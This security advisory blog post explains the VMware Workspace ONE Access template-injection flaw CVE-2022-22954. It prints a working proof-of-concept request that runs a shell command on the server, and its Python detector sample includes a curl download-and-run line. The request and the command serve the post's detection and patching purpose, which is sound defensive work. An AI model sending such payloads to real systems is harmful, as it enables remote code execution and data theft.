VMware Workspace One Access is highly vulnerable to Server-Side Template Injection

Dawn Treader
May 31, 2022

VMware Workspace One Access and Identity Manager Template Injection Vulnerability

VMware Workspace ONE Access (formerly VMware Identity Manager) is vulnerable to a Server-Side Template Injection tracked as CVE-2022-22954. The vulnerability is being actively exploited in the wild, and loader stages of malware such as Mirai variants have used it to download further payloads onto compromised web servers.

Server-Side Template Injection Attack

A Server-Side Template Injection (SSTI) vulnerability exists when user-supplied input becomes part of the server-side template that the application renders to generate dynamic content, instead of being passed to that template as data.

Many web applications accept user input without sanitization and use it to construct the template that produces the dynamic web content. Because the template engine evaluates whatever it is handed, the user-provided text is then executed rather than displayed, which leads to code execution on the server and, eventually, to the server being taken over. In some cases SSTI does not yield an immediate remote compromise, but it still gives the attacker a foothold on the web server from which further exploits can be launched, leading to full compromise.

In the case of this template injection vulnerability in VMware Workspace ONE Access, attackers chained the exploit with CVE-2022-22960, a local privilege-escalation vulnerability in the same products, to escalate to root.
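To make the distinction above concrete, here is an added example that is not from the original post and does not use FreeMarker: Python's str.format mini-language stands in for a template engine, because the root cause is the same. The vulnerable renderer splices user input into the template text, so format-field syntax in that input is evaluated and walks from a harmless object to the module's globals; the safe renderer keeps the template constant and passes the input as a value. The Greeting class, the SECRET_API_KEY value and the payload are all constructed for the demonstration.

```python
"""SSTI root cause illustrated with Python's str.format as a stand-in engine:
user input spliced into the template text versus user input passed as data."""


class Greeting:
    """Constructed stand-in for a server-side object handed to the template."""

    def __init__(self, user):
        self.user = user


# Constructed "server-side secret" that lives in this module's globals.
SECRET_API_KEY = "constructed-secret-do-not-leak"


def render_vulnerable(user_input: str) -> str:
    # BUG: the template is built by concatenating user input, so any
    # format-field syntax in that input is interpreted, not printed.
    template = "Hello, " + user_input + "!"
    return template.format(Greeting("bob"))


def render_safe(user_input: str) -> str:
    # The template is a constant; user input is only a value substituted
    # into it, so braces in the input are emitted literally.
    return "Hello, {name}!".format(name=user_input)


# Constructed payload: from positional argument 0 (the Greeting instance),
# reach its __init__ function's module globals and read SECRET_API_KEY.
PAYLOAD = "{0.__init__.__globals__[SECRET_API_KEY]}"

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))  # leaks the secret
    print(render_safe(PAYLOAD))        # prints the payload text verbatim
```

The payload never needs a code-execution primitive; attribute and item access inside a field is enough to read whatever the rendering object can reach, which is why "the template is built from untrusted text" is the bug to look for, regardless of engine.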

VMware Vulnerability, Triggering Mechanism and Consequences

The URI path /catalog-portal/ui/oauth/verify?error=&deviceUdid=

is vulnerable to a template injection attack. The FreeMarker Java template engine ships a class named freemarker.template.utility.Execute that runs an externally supplied command, and a template expression can instantiate it with FreeMarker's ?new() built-in. That is the behaviour exploited in the wild and identified as CVE-2022-22954. A request as shown below, with the payload placed in the deviceUdid parameter, will execute "cat /etc/passwd" on the target system.

GET http://(Server)/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

In a real request the payload is URL-encoded (${ becomes %24%7B, the quotes %22, and so on), so any detection has to decode the query string before matching.

The Execute class is instantiated inside the template expression and the command "cat /etc/passwd" runs locally on the web server. That command can be replaced with anything that serves the attacker's objective: downloading and executing further malware with curl, running privilege-escalation exploits such as CVE-2022-22960, and so on. There have also been reports of CVE-2022-22954 being used to upload web shells, such as Dingo J-spy, onto compromised hosts.

Threat Severity

Successful exploitation gives the attacker remote code execution on the VMware Workspace ONE Access installation. On Vehere's threat severity scale, which classifies threats as low, medium, high and critical, this threat falls under the high severity category; VMware's own advisory rates it critical, with a CVSSv3 base score of 9.8. It can lead to complete system compromise and exfiltration of sensitive data.

Vehere Detection and Best Practice Recommendation

Vehere's situational awareness product, PacketWorker, carries a rule named "CVE-2022-22954 Vmware Workspace One Access Identity Manager vulnerability", developed by our security research lab, which detects the malicious HTTP requests sent to VMware Workspace ONE Access to trigger the vulnerability. Beyond detection, we recommend that organizations patch their systems or apply the workarounds published by VMware, per the following links
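As an added example, and not Vehere's PacketWorker rule nor code from the original post, the following Python builds the PoC-style request from the "Triggering Mechanism" section with the payload URL-encoded as a client would actually send it, and runs a request-line detector over constructed sample lines. It assumes request lines are available as text (for instance from a reverse-proxy access log) and inspects only the endpoint and the two parameters named in this post; the sample lines and the 198.51.100.7 address are constructed.

```python
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Endpoint and parameters from the public PoC described in the post.
VULN_PATH = "/catalog-portal/ui/oauth/verify"
WATCHED_PARAMS = ("deviceUdid", "error")

# Request line "METHOD target [HTTP/x.y]". The target is captured lazily so
# that a raw (unencoded) payload containing spaces is still kept whole.
REQ_LINE_RE = re.compile(r"^(\S+)\s+(.+?)(?:\s+HTTP/\d(?:\.\d)?)?$")
# A FreeMarker interpolation that instantiates a class by name via ?new().
TEMPLATE_NEW_RE = re.compile(r'\$\{\s*"([\w.]+)"\s*\?new\(\)')
# The string handed to the Execute instance, i.e. the OS command.
EXECUTE_ARG_RE = re.compile(
    r'"freemarker\.template\.utility\.Execute"\s*\?new\(\)\s*\(\s*"([^"]*)"'
)


def build_probe(command: str, encode_rounds: int = 1) -> str:
    """Request line of a PoC-style probe. encode_rounds=0 gives the unencoded
    form shown in the post, 1 the form a client actually sends, 2 a
    double-encoded evasion attempt. Used here only to feed the detector."""
    payload = f'${{"freemarker.template.utility.Execute"?new()("{command}")}}'
    for _ in range(encode_rounds):
        payload = quote(payload, safe="")
    return f"GET {VULN_PATH}?error=&deviceUdid={payload} HTTP/1.1"


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so a double-encoded
    payload (%2524 -> %24 -> $) is inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(request_line: str):
    """Return None for a benign request line, otherwise a dict naming the
    abused parameter, the instantiated class, and the OS command when the
    class is Execute (i.e. the request is an RCE attempt)."""
    m = REQ_LINE_RE.match(request_line.strip())
    if not m:
        return None
    target = urlsplit(m.group(2))
    if target.path != VULN_PATH:
        return None
    params = parse_qs(target.query, keep_blank_values=True)  # decodes once
    for name in WATCHED_PARAMS:
        for raw in params.get(name, []):
            value = fully_decode(raw)
            hit = TEMPLATE_NEW_RE.search(value)
            if not hit:
                continue
            finding = {"param": name, "class": hit.group(1),
                       "rce": False, "command": None}
            arg = EXECUTE_ARG_RE.search(value)
            if arg:
                finding["rce"] = True
                finding["command"] = arg.group(1)
            return finding
    return None


def scan(lines):
    """Run the classifier over request lines; return (index, finding) pairs."""
    findings = []
    for index, line in enumerate(lines):
        finding = classify_request(line)
        if finding is not None:
            findings.append((index, finding))
    return findings


# Constructed sample request lines (198.51.100.7 is a documentation address,
# not a real indicator): the post's raw PoC, the same probe URL-encoded, a
# double-encoded download-and-run attempt, and two benign requests, one of
# them to the vulnerable endpoint with an ordinary device UDID.
SAMPLE_LINES = [
    build_probe("cat /etc/passwd", encode_rounds=0),
    build_probe("cat /etc/passwd"),
    build_probe("curl http://198.51.100.7/x.sh|sh", encode_rounds=2),
    "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=3f2a-constructed-udid HTTP/1.1",
    "GET /SAAS/auth/login HTTP/1.1",
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_LINES):
        print(index, finding)
```

The check normalizes percent-encoding before matching, so %24%7B and the double-encoded %2524%257B are caught alongside the raw form; it flags any ?new() instantiation in the watched parameters and separately marks the Execute case as an RCE attempt with the extracted command. Because it looks only at the request line and at the two query parameters named above, it is a starting point for a signature, not a complete one.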

